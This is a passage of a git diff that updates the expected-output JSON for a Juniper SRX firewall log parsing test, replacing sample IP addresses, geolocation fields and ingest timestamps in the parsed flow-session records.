destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="67.43.156.15" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log-expected.json index 6624647e57f..9d6243d438d 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-flow.log-expected.json @@ -6,7 +6,7 @@ "port": 10400 }, "port": 10400, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "informational" @@ -14,25 +14,22 @@ "destination": { "nat": { "port": 10400, - "ip": "216.160.83.57" + "ip": "67.43.156.13" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 10400, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "rule": { "name": "vpn_trust_permit-all" @@ -40,25 +37,10 @@ "source": { "nat": { "port": 594, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "10.0.0.1" }, "port": 594, - "ip": "216.160.83.57" + "ip": "10.0.0.1" }, "juniper": { "srx": { @@ -97,8 +79,8 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.0.0.1", + "67.43.156.13" ] }, "client": { @@ -106,12 +88,12 @@ "port": 594 }, "port": 594, - "ip": "216.160.83.57" + "ip": "10.0.0.1" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715367264Z", - "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.134 source-address=\"216.160.83.57\" source-port=\"594\" destination-address=\"175.16.199.1\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"594\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025343900Z", + "original": "\u003c14\u003e1 2019-11-14T09:37:51.184+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.0.0.1\" source-port=\"594\" destination-address=\"67.43.156.13\" destination-port=\"10400\" connection-tag=\"0\" service-name=\"icmp\" nat-source-address=\"10.0.0.1\" nat-source-port=\"594\" nat-destination-address=\"67.43.156.13\" nat-destination-port=\"10400\" nat-connection-tag=\"0\" src-nat-rule-type=\"N/A\" src-nat-rule-name=\"N/A\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"1\" policy-name=\"vpn_trust_permit-all\" source-zone-name=\"vpn\" destination-zone-name=\"trust\" session-id-32=\"6093\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"st0.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_started", @@ -129,7 +111,7 @@ { "server": { "port": 161, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "informational" @@ -137,40 +119,25 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 161, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "rule": { "name": "MgmtAccess-trust-cleanup" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 - }, "port": 37233, - "ip": "216.160.83.57" + "ip": "10.0.0.26" }, "juniper": { "srx": { @@ -210,18 +177,18 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.0.0.26", + "67.43.156.13" ] }, "client": { "port": 37233, - "ip": "216.160.83.57" + "ip": "10.0.0.26" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715388484Z", - "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.134 source-address=\"216.160.83.57\" source-port=\"37233\" destination-address=\"175.16.199.1\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025354900Z", + "original": "\u003c14\u003e1 2019-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"10.0.0.26\" source-port=\"37233\" destination-address=\"67.43.156.13\" destination-port=\"161\" connection-tag=\"0\" service-name=\"None\" protocol-id=\"17\" icmp-type=\"0\" policy-name=\"MgmtAccess-trust-cleanup\" source-zone-name=\"trust\" destination-zone-name=\"junos-host\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\".local..0\" encrypted=\"No\" reason=\"Denied by policy\" session-id-32=\"7087\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_deny", @@ -238,7 +205,7 @@ { "server": { "port": 2003, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -246,40 +213,37 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 2003, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "rule": { "name": "log-all-else" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 56639, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "juniper": { "srx": { @@ -316,18 +280,17 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "67.43.156.15" ] }, "client": { "port": 56639, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715393644Z", - "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@2636.1.1.1.2.39 source-address=\"216.160.83.57\" source-port=\"56639\" destination-address=\"175.16.199.1\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:15:58.025360300Z", + "original": "\u003c14\u003e1 2014-05-01T08:26:51.179Z fw01 RT_FLOW - RT_FLOW_SESSION_DENY [junos@67.43.156.15 source-address=\"67.43.156.15\" source-port=\"56639\" destination-address=\"67.43.156.15\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"]", "kind": "event", "action": "flow_deny", "category": [ @@ -348,7 +311,7 @@ "port": 902, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -356,24 +319,24 @@ "destination": { "nat": { "port": 902, - "ip": "5.6.7.8" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 902, "bytes": 0, - "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 0 }, "rule": { "name": "mngmt-to-vcenter" @@ -381,26 +344,23 @@ "source": { "nat": { "port": 63456, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 63456, "bytes": 94, - "ip": "216.160.83.57", + "ip": "67.43.156.15", "packets": 1 }, "juniper": { @@ -441,9 +401,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "5.6.7.8" + "67.43.156.15" ] }, "client": { @@ -453,13 +411,13 @@ "port": 63456, "bytes": 94, "packets": 1, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "event": { "duration": 60000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715397812Z", - "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.39 reason=\"unset\" source-address=\"216.160.83.57\" source-port=\"63456\" destination-address=\"175.16.199.1\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"175.16.199.1\" nat-source-port=\"63456\" nat-destination-address=\"5.6.7.8\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", + "ingested": "2021-12-10T10:15:58.025364900Z", + "original": "\u003c14\u003e1 2014-05-01T08:28:10.933Z fw01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"unset\" source-address=\"67.43.156.15\" source-port=\"63456\" destination-address=\"67.43.156.15\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"67.43.156.15\" nat-source-port=\"63456\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"]", "kind": "event", "start": "2014-05-01T08:28:10.933Z", "action": "flow_close", @@ -481,7 +439,7 @@ "port": 768 }, "port": 768, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "informational" @@ -489,22 +447,22 @@ "destination": { "nat": { "port": 768, - "ip": "30.0.0.100" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 768, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "alg-policy" @@ -512,25 +470,22 @@ "source": { "nat": { "port": 24065, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Asia", + "country_name": "Bhutan", "location": { - "lon": -122.3149, - "lat": 47.2513 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 209 + "number": 35908 }, "port": 24065, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -567,9 +522,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "30.0.0.100" + "67.43.156.14" ] }, "client": { @@ -577,12 +530,12 @@ "port": 24065 }, "port": 24065, - "ip": "216.160.83.57" + "ip": "67.43.156.14" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715401719Z", - "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.35 source-address=\"216.160.83.57\" source-port=\"24065\" destination-address=\"175.16.199.1\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", + "ingested": "2021-12-10T10:15:58.025370800Z", + "original": "\u003c14\u003e1 2013-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"24065\" destination-address=\"67.43.156.14\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"67.43.156.14\" nat-source-port=\"24065\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"]", "kind": "event", "action": "flow_started", "category": [ @@ -602,7 +555,7 @@ "port": 46384 }, "port": 46384, - "ip": "175.16.199.1" + "ip": "192.168.100.12" }, "log": { "level": "informational" @@ -610,28 +563,22 @@ "destination": { "nat": { "port": 46384, - "ip": "18.51.100.12" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 3, - "organization": { - "name": "Massachusetts Institute of Technology" - } + "number": 35908 }, "port": 46384, - "ip": "175.16.199.1" + "ip": "192.168.100.12" }, "rule": { "name": "policy1" @@ -639,25 +586,10 @@ "source": { "nat": { "port": 1, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "192.168.2.1" }, "port": 1, - "ip": "216.160.83.57" + "ip": "192.168.2.1" }, "juniper": { "srx": { @@ -694,9 +626,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "18.51.100.12" + "192.168.2.1", + "192.168.100.12", + "67.43.156.14" ] }, "client": { @@ -704,12 +636,12 @@ "port": 1 }, "port": 1, - "ip": "216.160.83.57" + "ip": "192.168.2.1" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715405386Z", - "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2626.192.0.2.1.40 source-address=\"216.160.83.57\" source-port=\"1\" destination-address=\"175.16.199.1\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"1\" nat-destination-address=\"18.51.100.12\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", + "ingested": "2021-12-10T10:15:58.025378900Z", + "original": "\u003c14\u003e1 2010-09-30T14:55:04.323+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "action": "flow_started", "category": [ @@ -731,7 +663,7 @@ "port": 46384, "bytes": 84, "packets": 1, - "ip": "175.16.199.1" + "ip": "192.168.100.12" }, "log": { "level": "informational" @@ -739,29 +671,23 @@ "destination": { "nat": { "port": 46384, - "ip": "18.51.100.12" + "ip": "67.43.156.14" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 3, - "organization": { - "name": "Massachusetts Institute of Technology" - } + "number": 35908 }, "port": 46384, "bytes": 84, - "ip": "175.16.199.1", + "ip": "192.168.100.12", "packets": 1 }, "rule": { @@ -770,27 +696,12 @@ "source": { "nat": { "port": 1, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "192.168.2.1" }, "port": 1, "bytes": 84, - "ip": "216.160.83.57", - "packets": 1 + "packets": 1, + "ip": "192.168.2.1" }, "juniper": { "srx": { @@ -830,9 +741,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "18.51.100.12" + "192.168.2.1", + "192.168.100.12", + "67.43.156.14" ] }, "client": { @@ -842,13 +753,13 @@ "port": 1, "bytes": 84, "packets": 1, - "ip": "216.160.83.57" + "ip": "192.168.2.1" }, "event": { "duration": 0, "severity": 14, - "ingested": "2021-11-25T09:37:16.715409794Z", - "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2626.192.0.2.1.40 reason=\"response received\" source-address=\"216.160.83.57\" source-port=\"1\" destination-address=\"175.16.199.1\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"1\" nat-destination-address=\"18.51.100.12\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", + "ingested": "2021-12-10T10:15:58.025386900Z", + "original": "\u003c14\u003e1 2010-09-30T14:55:07.188+08:00 mrpp-srx550-dut01 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"response received\" source-address=\"192.168.2.1\" source-port=\"1\" destination-address=\"192.168.100.12\" destination-port=\"46384\" service-name=\"icmp\" nat-source-address=\"192.168.2.1\" nat-source-port=\"1\" nat-destination-address=\"67.43.156.14\" nat-destination-port=\"46384\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"policy1\" source-zone-name=\"trustZone\" destination-zone-name=\"untrustZone\" session-id-32=\"41\" packets-from-client=\"1\" bytes-from-client=\"84\" packets-from-server=\"1\" bytes-from-server=\"84\" elapsed-time=\"0\" packet-incoming-interface=\"ge-0/0/1.0\"]", "kind": "event", "start": "2010-09-30T06:55:07.188Z", "action": "flow_close", @@ -872,7 +783,7 @@ "port": 80, "bytes": 535, "packets": 4, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -880,24 +791,24 @@ "destination": { "nat": { "port": 80, - "ip": "8.23.224.110" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 80, "bytes": 535, - "packets": 4, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 4 }, "rule": { "name": "permit_all" @@ -905,27 +816,12 @@ "source": { "nat": { "port": 19162, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "10.3.136.49" }, "port": 47776, "bytes": 337, - "ip": "216.160.83.57", - "packets": 6 + "packets": 6, + "ip": "10.3.255.203" }, "juniper": { "srx": { @@ -973,9 +869,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", - "8.23.224.110" + "10.3.255.203", + "67.43.156.15", + "10.3.136.49" ] }, "client": { @@ -985,13 +881,13 @@ "port": 47776, "bytes": 337, "packets": 6, - "ip": "216.160.83.57" + "ip": "10.3.255.203" }, "event": { "duration": 1000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715419302Z", - "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"TCP FIN\" source-address=\"216.160.83.57\" source-port=\"47776\" destination-address=\"175.16.199.1\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"175.16.199.1\" nat-source-port=\"19162\" nat-destination-address=\"8.23.224.110\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", + "ingested": "2021-12-10T10:15:58.025394900Z", + "original": "\u003c14\u003e1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"TCP FIN\" source-address=\"10.3.255.203\" source-port=\"47776\" destination-address=\"67.43.156.15\" destination-port=\"80\" connection-tag=\"0\" service-name=\"junos-http\" nat-source-address=\"10.3.136.49\" nat-source-port=\"19162\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"80\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"nat1\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"permit_all\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"5\" packets-from-client=\"6\" bytes-from-client=\"337\" packets-from-server=\"4\" bytes-from-server=\"535\" elapsed-time=\"1\" application=\"HTTP\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/0.0\" encrypted=\"No\" application-category=\"Web\" application-sub-category=\"N/A\" application-risk=\"4\" application-characteristics=\"Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;\"]", "risk_score": 4.0, "kind": "event", "start": "2019-04-12T14:29:06.576Z", @@ -1016,7 +912,7 @@ "port": 445, "bytes": 1575, "packets": 9, - "ip": "175.16.199.1" + "ip": "172.16.1.19" }, "log": { "level": "informational" @@ -1026,22 +922,10 @@ "port": 445, "ip": "172.16.1.19" }, - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", - "location": { - "lon": 125.3228, - "lat": 43.88 - } - }, "port": 445, "bytes": 1575, "packets": 9, - "ip": "175.16.199.1" + "ip": "172.16.1.19" }, "rule": { "name": "35" @@ -1049,27 +933,12 @@ "source": { "nat": { "port": 53232, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "192.168.2.164" }, "port": 53232, "bytes": 4274, - "ip": "216.160.83.57", - "packets": 13 + "packets": 13, + "ip": "192.168.2.164" }, "juniper": { "srx": { @@ -1109,8 +978,7 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1", + "192.168.2.164", "172.16.1.19" ] }, @@ -1121,13 +989,13 @@ "port": 53232, "bytes": 4274, "packets": 13, - "ip": "216.160.83.57" + "ip": "192.168.2.164" }, "event": { "duration": 16000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715429932Z", - "original": "\u003c14\u003e1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.58 reason=\"TCP RST\" source-address=\"216.160.83.57\" 